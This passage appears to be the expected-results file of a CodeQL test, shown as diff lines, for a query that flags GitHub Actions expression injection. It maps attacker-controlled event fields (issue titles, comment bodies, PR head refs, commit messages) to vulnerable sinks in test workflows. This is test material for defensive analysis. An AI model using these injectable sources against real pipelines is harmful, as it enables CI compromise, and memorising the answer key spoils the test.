.github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | semmle.label | github.event.workflow_run.head_commit.committer.email | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | -| action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | -subpaths -#select -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | -| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | -| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | -| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | -| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | -| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | -| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | -| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | -| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | -| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | -| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | -| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | -| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | -| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | -| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | -| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | -| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | 